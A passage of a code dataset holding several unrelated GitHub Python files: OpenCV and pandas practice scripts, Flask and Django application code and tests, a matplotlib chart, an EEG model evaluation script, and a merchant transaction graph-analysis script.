of 3 elements.\n x = np.ones((3,1), dtype = 'float32')\n # Element to element product. Se multiplica elemento por elemento [0]*[0], etc.\n y_0 = idy * x\n print(f'{y_0}')\n # Matrician product. Producto matricial de toda la vida.\n y_1 = np.dot(idy,x)\n print(f'{y_1}')\n # Matrix transpose\n idy_t = idy.T\n # Matrix inverse\n idy_i = np.linalg.inv(idy)\n # Equation solution of A*X = Y\n cv.solve(idy, y_0, x)\n # Scalar and vector product\n v = np.random.randint(1, 10, (1, 3), dtype = 'uint8')\n w = np.random.randint(1, 10, (1, 3), dtype = 'uint8')\n s = np.dot(v,w.T) # Necesita invertirlo por el rollo de las dimensiones: (1,3) * (3,1) = (1,1)\n z = np.cross(v,w)\n # Boolean map. The operations will return a matrix with the result of the given\n # conditions for each element of the original matrices. Any condition can be\n # applied.\n cond = idy > np.random.randint(1, 10, (3, 3), dtype = 'uint8')\n\n#example_5(imgs)\n###############################################################################\n# 6. La practica. Escribir y probar un programa que tome imágenes con una cámara\n# y las muestre en pantalla. Si tu computador no lleva cámara integrada, \n# necesitarás una webcam (sirve una sencilla de 10 Euros).\n# Inicializar el medio para hacer la foto.\ncam = cv.VideoCapture(0)\n# Hacer la foto\nret, frame = cam.read()\nif ret:\n cv.namedWindow('Practica 0', cv.WINDOW_AUTOSIZE)\n imshow_properties(frame, 'Practica 0')\n cv.waitKey(0)\n cv.imwrite('captured.jpg', frame)\n cv.destroyWindow('Practica 0') # cv2.destroyAllWindows()\ncam.release()","repo_name":"dedetheprogrammer/vision22-23","sub_path":"vc_practica0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25799902535","text":"from pydantic import BaseModel\n\n\nclass CreateTrainingSessionRequest(BaseModel):\n training_id: int\n\n def to_query_string(self):\n params = self.dict()\n query = []\n for param, value in params.items():\n if value is None:\n continue\n query.append(f\"{param}={value}\")\n return \"&\".join(query)\n","repo_name":"fiufit/gateway","sub_path":"src/models/trainings/create_training_session.py","file_name":"create_training_session.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"31637466155","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\n\nfrom datastore import models\n\nfrom datetime import datetime\n\n\nclass ConsumptionRecordTestCase(TestCase):\n\n def setUp(self):\n user = User.objects.create_user('john', 'lennon@thebeatles.com',\n 'johnpassword')\n project = models.Project.objects.create(\n project_owner=user.projectowner,\n project_id=\"PROJECTID_6\",\n )\n consumptionmetadata = models.ConsumptionMetadata.objects.create(\n project=project,\n interpretation=\"E_C_S\",\n unit=\"KWH\",\n )\n self.consumptionrecord = models.ConsumptionRecord.objects.create(\n metadata=consumptionmetadata,\n start=datetime(2011, 1, 1),\n value=0.0,\n estimated=True,\n )\n\n def test_attributes(self):\n attributes = [\n \"metadata\",\n \"start\",\n \"value\",\n \"estimated\",\n ]\n for attribute in attributes:\n assert hasattr(self.consumptionrecord, attribute)\n\n def test_eemeter_record(self):\n record = self.consumptionrecord.eemeter_record()\n assert isinstance(record, dict)\n","repo_name":"impactlab/oeem-energy-datastore","sub_path":"datastore/tests/models/test_consumption_record.py","file_name":"test_consumption_record.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"43537421014","text":"import numpy as np\nimport pandas as pd\nfrom pandas import DataFrame, Series\n\n# pandas 最重要的一个功能是,它可以对不同索引的对象进行算术运算。在将对象相加时,如果存在不同的索引,则结果的索引就是该索引对的并集。\n\ns1 = Series([7.3, -2.5, 3.4, 1.5], index=[\"a\", \"c\", \"d\", \"e\"])\ns2 = Series([-2.1, 3.6, -1.5, 4, 3.1], index=[\"a\", \"c\", \"e\", \"f\", \"g\"])\nprint(s1 + s2)\n\nframe1 = DataFrame(np.arange(9).reshape((3, 3)), columns=list(\"bcd\"), index=[\"Ohio\", \"Texas\", \"Colorado\"])\nprint(frame1)\nframe2 = DataFrame(np.arange(12).reshape((4, 3)), columns=list(\"bde\"), index=[\"Utah\", \"Ohio\", \"Texas\", \"Oregen\"])\nprint(frame2)\nprint(frame1 + frame2)\n# 对齐会同时发生在行和列上\n# columns = list(\"qwertyu\")\n","repo_name":"songxinjianqwe/DataAnalysisWithPython","sub_path":"ch5/BasicFunction/bf5.py","file_name":"bf5.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34487913948","text":"from flask import current_app, Flask, jsonify, request, g\nfrom flask_marshmallow import Marshmallow\nfrom flask_cors import CORS\nfrom flask_caching import Cache\nfrom datetime import datetime\nimport logging\nfrom .config import config_factory\nfrom .utils import metadata_log, init_DB, exponential_backoff, DBFailure\n\n\norigins = ['*']\n\ncors = CORS()\nmm = Marshmallow()\ncache = Cache()\n\n'''\nApplication factory for application package. \\\nDelays creation of an app by moving it into a factory function that can be \\\nexplicitly invoked from script and apply configuration changes.\n'''\n\ndef create_app(config):\n app = Flask(__name__)\n\n # disable WSGI logging\n logging.getLogger('werkzeug').disabled = True\n\n app.config.from_object(config_factory[config]) # load config from python module\n config_factory[config].init_app(app)\n\n # Exposes all resources matching /* to CORS and allows Content-Type header\n # For cookies, need implement CSRF as additional security measure\n cors.init_app(app, resources={r\"/*\": {\"origins\": origins}})\n mm.init_app(app)\n cache.init_app(app)\n\n # although docker-compose starts DB first, it does not wait for DB to be ready\n # exponential backoff for resilience\n with app.app_context():\n exponential_backoff(Exception)(init_DB)()\n \n \n from portcast_app.api.v1 import api_v1 as api_blueprint\n app.register_blueprint(api_blueprint, url_prefix='/api/v1')\n\n register_global_errors(app)\n register_global_hooks(app)\n\n return app\n\n\ndef register_global_hooks(app):\n\n # @app.before_first_request\n # def initialize():\n # init_DB()\n\n @app.before_request\n def set_global_variables():\n g.request_timestamp_start = datetime.utcnow()\n g.context = request.json if request.method == 'POST' else None\n\n\n @app.after_request\n def log_request(resp):\n if resp.status_code < 400:\n current_app.logger.info(\n 'after request logging',\n extra=metadata_log(resp.status_code, g)\n )\n return resp\n \n @app.teardown_appcontext\n def close_DB(f):\n if hasattr(g, 'mysql_db'):\n g.mysql_db.close()\n\n if hasattr(g, 'requests'):\n g.requests.close()\n\n return f\n\n\n\ndef register_global_errors(app):\n \n @app.errorhandler(400)\n def bad_request(e):\n current_app.logger.error(e)\n return jsonify({\n 'error': 'bad request',\n 'message': e.description,\n }), 400\n\n\n @app.errorhandler(404)\n def endpoint_not_found(e):\n current_app.logger.error(e)\n return jsonify({\n 'error': 'resource not found',\n 'message': e.description\n }), 404\n\n\n @app.errorhandler(500)\n def server_error(e):\n current_app.logger.error(e)\n return jsonify({\n 'error': 'server error',\n 'message': e.description\n }), 500","repo_name":"daronphang/portcast_assignment","sub_path":"portcast_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2303131877","text":"from math import log, e, exp\r\n\r\nf = lambda x: x - (e**x - 4*x**2 )/(e**x - 8*x)\r\ntol = 0.01\r\nx0 = float(input('Input initial value!= 0: '))\r\n\r\nfor i in range(1,30):\r\n xn = f(x0)\r\n if abs(xn-x0)= conf.START_DATE) & (rtn_df[\"plat_date\"] <= conf.END_DATE)]\n\n return rtn_df\n\n\ndef get_point_csv(parm_df):\n pnt_df = pd.DataFrame({})\n logger.info(\"****MAKING POINT CSV FILE BEGIN****\")\n label_list = [\"mer_id\", \"mobile_no\"]\n logger.info(\"[1]. POINT LABEL LIST:\")\n logger.info(label_list)\n\n logger.info(\"[2]. GET POINT LABEL CSV:\")\n for label in label_list:\n single_pnt_df = pd.DataFrame({})\n pnt_list = pd.Series(parm_df[label].unique()).tolist()\n logger.info(\"==>> LABEL: %s, COUNT: %s\" % (label, len(pnt_list)))\n single_pnt_df[\"label\"] = pd.Series(parm_df[label].unique())\n single_pnt_df[\"class\"] = label\n pnt_df = pnt_df.append(single_pnt_df)\n del single_pnt_df\n\n logger.info(\"[3]. POINT[SHAPE]:\")\n logger.info(pnt_df.shape)\n\n logger.info(\"[4]. SAVE POINT CSV FILE:\")\n pnt_path = conf.RESULT_PATH + \"pnt\" + \".csv\"\n pnt_df.to_csv(pnt_path, index=False)\n logger.info(\"SAVE TO: %s\" % pnt_path)\n logger.info(\"****MAKING POINT CSV FILE END****\")\n del pnt_df\n del parm_df\n\n\ndef get_relation_csv(parm_df):\n\n\n\n rlat_df = pd.DataFrame({})\n pnt_df = pd.DataFrame({})\n logger.info(\"****MAKING RELATION CSV FILE BEGIN****\")\n label_list = [\"mobile_no\"]\n logger.info(\"[1]. RELATION LABEL LIST:\")\n logger.info(label_list)\n\n # logger.info(parm_df[parm_df[\"mobile_no\"] == \"13013330277\"])\n\n logger.info(\"[2]. GET RELATION LABEL CSV:\")\n for label in label_list:\n single_pnt_df = pd.DataFrame({})\n logger.info(\"==>> LABEL: %s\" % label)\n parm_dup = parm_df.drop_duplicates([\"mer_id\", label])\n single_rlat_df = pd.pivot_table(parm_dup, index=[label], values=[\"mer_id\"],aggfunc=len).reset_index()\n\n logger.info(single_rlat_df.shape)\n logger.info(single_rlat_df)\n\n logger.info(len(single_rlat_df[\"mer_id\"].unique().tolist()))\n\n pnd_lbl_list = pd.Series(single_rlat_df[single_rlat_df[\"mer_id\"] > 1][label]).tolist()\n logger.info(\"==>> PENDING LABEL LENGTH: %s\" % len(pnd_lbl_list))\n sys.exit(0)\n pnd_lbl_df = pd.DataFrame(parm_df[parm_df[label].isin(pnd_lbl_list)])\n pnd_rlat = pd.pivot_table(pnd_lbl_df, index=[label,\"mer_id\"], values=[\"inst_id\"], aggfunc=len).reset_index()\n\n pnd_rlat.rename(columns={label: \"source\", \"mer_id\": \"target\", \"inst_id\": \"weight\"}, inplace=True)\n pnd_rlat[\"type\"] = \"Undirected\"\n pnd_rlat[\"label\"] = \"mer_with_\" + label\n rlat_df = rlat_df.append(pnd_rlat)\n\n pnt_list = pd.Series(pnd_lbl_df[label].unique()).tolist()\n logger.info(\"==>> LABEL: %s, COUNT: %s\" % (label, len(pnt_list)))\n single_pnt_df[\"label\"] = pd.Series(pnd_lbl_df[label].unique())\n single_pnt_df[\"class\"] = label\n pnt_df = pnt_df.append(single_pnt_df)\n\n del single_rlat_df\n\n logger.info(\"[3]. SINGLE RELATION[SHAPE]:\")\n print(pnt_df)\n logger.info(pnt_df.shape)\n\n logger.info(\"[3]. ALL RELATION[SHAPE]:\")\n print(rlat_df)\n logger.info(rlat_df.shape)\n\n logger.info(\"[4]. SAVE RELATION CSV FILE:\")\n rlat_path = conf.RESULT_PATH + \"rlat\" + \".csv\"\n rlat_df.to_csv(rlat_path, index=False)\n logger.info(\"SAVE TO: %s\" % rlat_path)\n logger.info(\"****MAKING RELATION CSV FILE END****\")\n del rlat_df\n del parm_df\n\n\ndef overall_rpt(parm_rst):\n global CAP_TRX_CNT, TOT_TRX_AMT\n # date_range = 31\n logger.info(\"****OVERALL REPORT START****\")\n logger.info(parm_rst.head(1)[\"plat_date\"])\n logger.info(parm_rst.tail(1)[\"plat_date\"])\n logger.info(\"[1]. TOTAL DATA SHAPE:\")\n logger.info(parm_rst.shape)\n logger.info(\"[2]. STATISTICS RANGE: FROM %s TO %s\" % (conf.START_DATE, conf.END_DATE))\n total_trx_amount = round(TOT_TRX_AMT / 1000000000, 2)\n logger.info(\"[3]. TOTAL TRANSACTION COUNT: %s\" % CAP_TRX_CNT)\n logger.info(\"[4]. TOTAL TRANSACTION AMOUNT: %s BILLION\" % total_trx_amount)\n mer_id_cnt = np.array(parm_rst[\"mer_id\"].unique())\n prod_id_cnt = pd.DataFrame(np.array(parm_rst[\"prod_id\"].unique()).tolist()).dropna(axis=0, how='any').size\n device_id_cnt = pd.DataFrame(np.array(parm_rst[\"td_device\"].unique()).tolist()).dropna(axis=0, how='any').size\n device_id_cnt_daily = round(device_id_cnt / conf.DATE_RANGE, 2)\n logger.info(\"[5]. TOTAL MERCHANT COUNT: %s\" % mer_id_cnt.size)\n mer_id_details_path = conf.RESULT_PATH + \"mer_id_details\" + \".csv\"\n # pd.DataFrame(rst[\"mer_id\"].value_counts()).reset_index().head(10).to_csv(mer_id_details_path, index=False)\n logger.info(\"TOP10 MERCHANT COUNT DETAILS SAVE TO %s\" % mer_id_details_path)\n logger.info(\"[6]. TOTAL PRODUCT COUNT: %s\" % prod_id_cnt)\n prod_id_details_path = conf.RESULT_PATH + \"prod_id_details\" + \".csv\"\n # pd.DataFrame(rst[\"prod_id\"].value_counts()).reset_index().to_csv(prod_id_details_path, index=False)\n logger.info(\"PRODUCT COUNT DETAILS SAVE TO: %s\" % prod_id_details_path)\n logger.info(\"[7]. TOTAL DEVICE CAPTURE COUNT: %s\" % device_id_cnt)\n logger.info(\"[8]. DAILY DEVICE CAPTURE COUNT: %s\" % device_id_cnt_daily)\n td_device_details_path = conf.RESULT_PATH + \"td_device_details\" + \".csv\"\n # pd.DataFrame(rst[\"td_device\"].value_counts()).reset_index().head(10).to_csv(td_device_details_path, index=False)\n logger.info(\"TOP10 DEVICE COUNT DETAILS SAVE TO %s\" % td_device_details_path)\n logger.info(\"****OVERALL REPORT END****\")\n\n\ndef data_preproc(parm_csv_folder, parm_csv_file_list):\n global CAP_TRX_CNT, TOT_TRX_AMT\n CAP_TRX_CNT = 0.\n TOT_TRX_AMT = 0.\n rst = pd.DataFrame({})\n\n # gc.set_debug(gc.DEBUG_STATS | gc.DEBUG_LEAK)\n gc.collect()\n gc.disable()\n for csv_file in parm_csv_file_list:\n # 1. 获取CSV文件路径\n csv_file_path = os.path.join('%s%s%s' % (parm_csv_folder, '/', csv_file))\n logger.info(\"csv_file_path = %s\" % csv_file_path)\n csv_file_path = \"D:/github_program/myPython/docs/csvfiles/201801/td_device_201801\"\n # csv_file_path = \"D:/github_program/myPython/docs/csvfiles/todo_td/NO 1_td_1\"\n\n # 2. 读取CSV文件\n reader = pd.read_csv(csv_file_path, encoding='utf-8', chunksize=5000, iterator=True, sep=\"|\", dtype=str)\n\n # 3. 数据处理\n df_trx_detail = get_trx_detail(reader)\n logger.info(\"SINGLE CHUNK SHAPE:\")\n logger.info(df_trx_detail.shape)\n CAP_TRX_CNT = CAP_TRX_CNT + df_trx_detail.shape[0]\n TOT_TRX_AMT = TOT_TRX_AMT + df_trx_detail[\"trx_amount\"].sum()\n rst = rst.append(df_trx_detail, ignore_index=True)\n reader.close()\n del reader\n del df_trx_detail\n gc.enable() # re-enable garbage collection\n gc.collect()\n\n return rst\n\n\ndef get_csv_folder():\n # father_path = os.path.abspath(os.path.dirname(os.getcwd()) + os.path.sep + \".\")\n # default_dir = os.path.abspath(os.path.dirname(father_path) + os.path.sep + \"..\") + '\\\\docs\\\\csvfiles'\n csv_folder = \"D:/github_program/myPython/docs/csvfiles/todo_td/\"\n # csv_folder = tf.askdirectory(title=u\"选择文件CSV文件夹\", initialdir=conf.CSV_PATH)\n if len(csv_folder) == 0:\n tm.showinfo(title='提示', message='请选取的CSV文件夹')\n sys.exit(0)\n\n return csv_folder\n\n\ndef create_rpt(parm_rst):\n if len(parm_rst) != 0:\n logger.info(\"--------------------------------------------\")\n # 1. OVERALL REPORT\n # overall_rpt(parm_rst)\n logger.info(\"--------------------------------------------\")\n parm_rst = parm_rst[parm_rst[\"mobile_no\"] != \"00000000000\"]\n # 2. get_point_csv\n # get_point_csv(parm_rst)\n logger.info(\"--------------------------------------------\")\n # 3. get_relation_csv\n # len(parm_rst[\"mer_id\"].unique().tolist())\n logger.info(len(parm_rst[\"mer_id\"].unique().tolist()))\n\n\n\n get_relation_csv(parm_rst)\n else:\n logger.info(\"parm_rst IS NULL, WRONG...\")\n del parm_rst\n\n\ndef main_process(parm_csv_folder):\n \"\"\"\n Data Preparation From CSV File & Insert into DB\n\n Parameters:\n parm_csv_folder: CSV file path\n\n Returns:\n None\n\n Raises:\n IOError: An error occurred accessing the bigtable.Table object.\n \"\"\"\n csv_file_list = os.listdir(parm_csv_folder)\n logger.info(\"PENDING CSV FILES LIST: %s\" % csv_file_list)\n rst = data_preproc(csv_folder, csv_file_list)\n create_rpt(rst)\n logger.info(\"--------------------------------------------\")\n logger.info('Main Processing Have Done...')\n\n\ndef init():\n logger.info(\"\\n####LOG START####\")\n logger.info(\"\\n--------------------------------------------\")\n logger.info(\"[1]. SYSTEM CONSTANT:\")\n logger.info(\"LOG PATH: %s\" % conf.LOG_PATH)\n logger.info(\"RESULT PATH: %s\" % conf.RESULT_PATH)\n logger.info(\"[2]. BUSINESS CONSTANT:\")\n logger.info(\"START DATE: %s\" % conf.START_DATE)\n logger.info(\"END DATE: %s\" % conf.END_DATE)\n logger.info(\"DATE RANGE: %s\" % conf.DATE_RANGE)\n logger.info(\"ID HURDLE: %s\" % conf.ID_HURDLE)\n logger.info(\"TRX HURDLE: %s\" % conf.TRX_HURDLE)\n logger.info(\"--------------------------------------------\")\n\n\nif __name__ == '__main__':\n start_time = datetime.datetime.now()\n conf = config.DeviceConfig()\n logger = Logger(path=conf.LOG_PATH)\n init()\n csv_folder = get_csv_folder()\n logger.info('CSV FILES FOLDER: %s' % csv_folder)\n main_process(csv_folder)\n end_time = datetime.datetime.now()\n logger.info(\"--------------------------------------------\")\n logger.info(\"Total Processing Time:\")\n logger.info('START TIME = %s' % start_time)\n logger.info('END TIME = %s' % end_time)\n logger.info('DIFF TIME = %s' % (end_time - start_time))\n logger.info('System Processing Have Done...')\n","repo_name":"GaaraKai/myPython","sub_path":"riskproject/test/core/gephi_stat.py","file_name":"gephi_stat.py","file_ext":"py","file_size_in_byte":12147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15917243456","text":"# Import libraries\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\n# Creating dataset\nsize = 6\ncars = ['AUDI', 'BMW', 'FORD',\n\t\t'TESLA', 'JAGUAR', 'MERCEDES']\n\ndata = np.array([[23, 16], [17, 23],\n\t\t\t\t[35, 11], [29, 33],\n\t\t\t\t[12, 27], [41, 42]])\n\n# normalizing data to 2 pi\nnorm = data / np.sum(data)*2 * np.pi\n\n# obtaining ordinates of bar edges\nleft = np.cumsum(np.append(0,\n\t\t\t\t\t\tnorm.flatten()[:-1])).reshape(data.shape)\n\n# Creating color scale\ncmap = plt.get_cmap(\"tab20c\")\nouter_colors = cmap(np.arange(6)*4)\ninner_colors = cmap(np.array([1, 2, 5, 6, 9,\n\t\t\t\t\t\t\t10, 12, 13, 15,\n\t\t\t\t\t\t\t17, 18, 20 ]))\n\n# Creating plot\nfig, ax = plt.subplots(figsize =(10, 7),\n\t\t\t\t\tsubplot_kw = dict(polar = True))\n\nax.bar(x = left[:, 0],\n\twidth = norm.sum(axis = 1),\n\tbottom = 1-size,\n\theight = size,\n\tcolor = outer_colors,\n\tedgecolor ='w',\n\tlinewidth = 1,\n\talign =\"edge\")\n\nax.bar(x = left.flatten(),\n\twidth = norm.flatten(),\n\tbottom = 1-2 * size,\n\theight = size,\n\tcolor = inner_colors,\n\tedgecolor ='w',\n\tlinewidth = 1,\n\talign =\"edge\")\n\nax.set(title =\"Nested pie chart\")\nax.set_axis_off()\n\n# show plot\nplt.show()\n","repo_name":"Kulbhushankarn/Plot-pie-chart-using-Matplotlib","sub_path":"code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31838573236","text":"import copy\n\ndef safeUpdate(d1, d2, *str):\n # Creates a copy of the dictionary d1 and overwrites the matching key values available in d2.\n # d2 is also copied. Both d1 and d2 stays intact\n # if str is a list of strings, d2 is interpreted to be a nested dictionary.\n # In that case, it is searched iteratively for the strings to get the right dictionary to be matched to d1\n d1Copy = d1.copy( )\n d2Copy = d2.copy( )\n for s in str:\n if s in d2Copy:\n if isinstance(d2Copy[s], dict):\n d2Copy = d2Copy[s].copy()\n else:\n d2Copy = {}\n else:\n d2Copy = {}\n\n common_keys = set(d1Copy.keys( )) & set(d2Copy.keys( ))\n d1Copy.update({k: d2Copy[k] for k in common_keys})\n return d1Copy\n\n\ndef safeRemove(d, *str):\n # removes the keys in str from a copy of dictionary d and returns it. d remains intact\n dCopy = copy.deepcopy(d)\n [dCopy.pop(s, None) for s in str]\n return dCopy\n\n\n\n","repo_name":"shajain/GaussianMixtureEmbedding","sub_path":"misc/dictUtils.py","file_name":"dictUtils.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34861237529","text":"import sys\nsys.path.append('..')\nfrom src import ML\nfrom src import config\nfrom src.Standard import SpectralAverage\nimport os\nfrom tqdm import tqdm\nimport argParser\nfrom datetime import datetime\nimport numpy as np\n\n\ndef main():\n\n args = argParser.main([\n 'studies_folder',\n 'study_names',\n 'task',\n 'data_type',\n 'log_dirs',\n 'checkpoint_dirs',\n 'length',\n 'channels',\n 'artifact',\n 'erp_degree',\n 'filter_band',\n 'normalize',\n 'plot_spectra',\n 'plot_hist',\n 'plot_conf',\n 'plot_3d_preds',\n # 'pred_level',\n 'fallback',\n 'combine',\n 'limited_subjects'\n ])\n\n data_type = args.data_type\n studies_folder = args.studies_folder\n study_names = args.study_names\n log_dirs = args.log_dirs\n checkpoint_dirs = args.checkpoint_dirs\n combine = args.combine\n limited_subjects = args.limited_subjects\n fallback = args.fallback\n # pred_level = args.pred_level\n task = args.task\n length = args.length\n channels = args.channels\n artifact = args.artifact\n erp_degree = args.erp_degree\n filter_band = args.filter_band\n normalize = args.normalize\n plot_spectra = args.plot_spectra\n plot_hist = args.plot_hist\n plot_conf = args.plot_conf\n plot_3d_preds = args.plot_3d_preds\n\n # patient_path points to our 'condition-positive' dataset\n # ex. patient_path =\n # \"/wavi/EEGstudies/CANlab/spectra/P300_250_1111111111111111111_0_1\"\n if checkpoint_dirs is None:\n checkpoint_dirs = [\n log_dir + folder\n for folder in os.listdir(log_dir)\n if \"_\"+data_type in folder]\n checkpoint_dirs.sort()\n else:\n checkpoint_dirs = [log_dirs[0] + dir for dir in checkpoint_dirs]\n\n patient_paths = []\n for study_name in study_names:\n\n patient_path = studies_folder\\\n + '/'\\\n + study_name\\\n + '/'\\\n + data_type\\\n + '/'\\\n + task\\\n + '_'\\\n + str(length)\\\n + '_'\\\n + channels\\\n + '_'\\\n + str(artifact)\n\n if erp_degree is not None:\n patient_path += (\"_\" + str(erp_degree))\n\n if not os.path.isdir(patient_path):\n print(\"Configuration supplied was not found in study folder data.\")\n print(\"Failed:\", patient_path)\n raise FileNotFoundError\n sys.exit(3)\n\n patient_paths.append(patient_path)\n\n # Instantiate a 'Classifier' object\n myclf = ML.Classifier(data_type)\n\n # ============== Load All Studies' Data ==============\n for study_name, patient_path in zip(study_names, patient_paths):\n\n fnames = os.listdir(patient_path)\n # used for only loading in subset of subjects for evaluation\n if limited_subjects is not None:\n fnames = [fname for fname in fnames\n if fname[:config.participantNumLen] in limited_subjects]\n\n for fname in fnames:\n if \"_\"+filter_band in fname:\n myclf.LoadData(patient_path+\"/\"+fname)\n\n # fallback\n if fallback is True:\n # find unused subjects\n fallback_subs = {}\n # get translator path\n translator_file = open(\n studies_folder + \"/\" + study_name\\\n + \"/\" + \"translator_\"+task+\".txt\",\n 'r')\n for line in translator_file.readlines():\n subject_k = line.strip('\\n').split('\\t')[-1]\n if subject_k not in myclf.subjects:\n fallback_subs[subject_k] = None\n\n print(\"Fallback 1 subjects:\", fallback_subs.keys())\n\n # get path of one it looser artifact study folder\n fallback_patient_path = patient_path.replace(str(artifact), '1')\n # and its fnames that contain fallback subs\n fnames = [fname for fname in os.listdir(fallback_patient_path) if\\\n fname[:config.participantNumLen] in fallback_subs]\n for fname in fnames:\n if \"_\"+filter_band in fname:\n myclf.LoadData(fallback_patient_path+\"/\"+fname)\n fallback_subs[fname[:config.participantNumLen]] = 1\n\n # # find unused subjects\n # fallback_subs = {}\n # # get translator path\n # translator_file = open(\n # studies_folder + \"/\" + study_name\\\n # + \"/\" + \"translator_\"+task+\".txt\",\n # 'r')\n # for line in translator_file.readlines():\n # subject_k = line.strip('\\n').split('\\t')[-1]\n # if subject_k not in myclf.subjects:\n # fallback_subs[subject_k] = None\n\n print(\"Fallback 2 subjects:\", fallback_subs.keys())\n\n # get path of one it looser artifact study folder\n fallback_patient_path = patient_path.replace(str(artifact), '2')\n # and its fnames that contain fallback subs\n fnames = [fname for fname in os.listdir(fallback_patient_path) if\\\n fallback_subs[fname[:config.participantNumLen]] is None]\n for fname in fnames:\n if \"_\"+filter_band in fname:\n myclf.LoadData(fallback_patient_path+\"/\"+fname)\n fallback_subs[fname[:config.participantNumLen]] = 2\n\n #\n # if combine is not True:\n #\n # for checkpoint_dir in checkpoint_dirs:\n #\n # label_names=checkpoint_dir.split('_')[7:]\n # label_values=[]\n # for group in label_names:\n # for key, value in config.group_names.items():\n # if group == value:\n # label_values.append(key)\n #\n # myclf.Prepare(\n # tt_split=1,\n # labels=label_values,\n # normalize=normalize,\n # eval=True)\n #\n # if data_type == 'spectra':\n # if plot_spectra is True:\n # specavgObj = SpectralAverage(myclf)\n # specavgObj.plot(\n # fig_fname=checkpoint_dir+\"/\"\n # + study_name\n # + \"_true_\"\n # + str(datetime.now().strftime(\"%H-%M-%S\")))\n #\n # y_preds = myclf.eval_saved_CNN(\n # checkpoint_dir,\n # plot_hist=plot_hist,\n # plot_conf=plot_conf,\n # plot_3d_preds=plot_3d_preds,\n # fname=study_name,\n # # pred_level=pred_level,\n # save_results=True)\n #\n # for i, (pred, inputObj) in enumerate(\n # zip(np.rint(y_preds), myclf.data)):\n #\n # inputObj.group = myclf.groups[int(np.argmax(pred))]\n #\n # if data_type == 'spectra':\n # if plot_spectra is True:\n # specavgObj = SpectralAverage(myclf)\n # specavgObj.plot(\n # fig_fname=checkpoint_dir+\"/\"\n # + study_name\n # + \"_pred_\"\n # + str(datetime.now().strftime(\"%H-%M-%S\")))\n\n # if combine is True:\n for checkpoint_dir in checkpoint_dirs:\n\n label_names=checkpoint_dir.split('_')[7:]\n label_values=[]\n for group in label_names:\n for key, value in config.group_names.items():\n if group == value:\n label_values.append(key)\n\n myclf.Prepare(\n tt_split=1,\n labels=label_values,\n normalize=normalize,\n eval=True)\n\n if data_type == 'spectra':\n if plot_spectra is True:\n specavgObj = SpectralAverage(myclf)\n specavgObj.plot(\n fig_fname=checkpoint_dir+\"/\"\n + study_name\n + \"_true_\"\n + str(datetime.now().strftime(\"%H-%M-%S\")))\n\n y_preds = myclf.eval_saved_CNN(\n checkpoint_dir,\n plot_hist=plot_hist,\n plot_conf=plot_conf,\n plot_3d_preds=plot_3d_preds,\n fname=(study_name + \"_\"+str(artifact)) if limited_subjects is not None\\\n else study_name,\n # pred_level=pred_level,\n save_results=True,\n fallback_list=None if fallback is False else fallback_subs)\n\n # TODO:\n # broken, can't change label here for combination runs\n # for i, (pred, inputObj) in enumerate(\n # zip(np.rint(y_preds), myclf.data)):\n #\n # inputObj.group = myclf.groups[int(np.argmax(pred))]\n\n # if data_type == 'spectra':\n # if plot_spectra is True:\n # specavgObj = SpectralAverage(myclf)\n # specavgObj.plot(\n # fig_fname=checkpoint_dir+\"/\"\n # + study_name\n # + \"_pred_\"\n # + str(datetime.now().strftime(\"%H-%M-%S\")))\n\nif __name__ == '__main__':\n main()\n","repo_name":"canlab/WAViMedEEG","sub_path":"scripts/Run_eval_saved_model.py","file_name":"Run_eval_saved_model.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"28027459246","text":"from django.test import TestCase\nfrom catalog import models as cmod\nfrom decimal import Decimal\nimport json as json\n\nclass FomoUserTestCase(TestCase):\n\n def test_create_a_unique_product(self):\n ## Will create a category and a unique product, then make sure the values saved and that we have access to those values\n ## Assumptions\n # User would be logged in\n # User would have the permissions to create a product\n\n # Create a category\n cat5 = cmod.Category()\n cat5.codename = 'st'\n cat5.name = 'Strings'\n cat5.save()\n\n # Create a Unique Product\n p1 = cmod.UniqueProduct()\n p1.product = p1\n p1.serial_number = '1234asdf'\n p1.name = 'Violin'\n p1.category = cat5\n p1.price = Decimal('250.99')\n dList = ['Violin hand made in 1456', 'Played be Bach and Beethoved', 'Korys favorite instrument']\n p1.descriptionList = json.dumps(dList)\n iList = ['/static/homepage/media/img/violin.jpg', '/static/homepage/media/img/violin2.png', '/static/homepage/media/img/violin3.jpg', '/static/homepage/media/img/thumbnail_violin.jpg']\n p1.imgList = json.dumps(iList)\n p1.save()\n\n p2 = cmod.Product.objects.get(id=p1.id)\n self.assertEquals(p2.serial_number, '1234asdf')\n self.assertEquals(p2.name, 'Violin')\n self.assertEquals(p2.category, cat5)\n self.assertEquals(p2.price, Decimal('250.99'))\n self.assertEquals(p2.descriptionList, json.dumps(dList))\n self.assertEquals(p2.imgList, json.dumps(iList))\n\n def test_create_a_Bulk_Product(self):\n ## Will create a category and a Bulk product, then make sure the values saved and that we have access to those values\n ## Assumptions\n # User would be logged in\n # User would have the permissions to create a product\n\n # Create a category\n cat4 = cmod.Category()\n cat4.codename = 'ac'\n cat4.name = 'Accessories'\n cat4.save()\n\n # Create a Bulk Product\n p3 = cmod.BulkProduct()\n p3.name = 'Sheet Music 1'\n p3.category = cat4\n p3.price = Decimal('9.50')\n p3.quantity = 20\n p3.reorder_trigger = 5\n 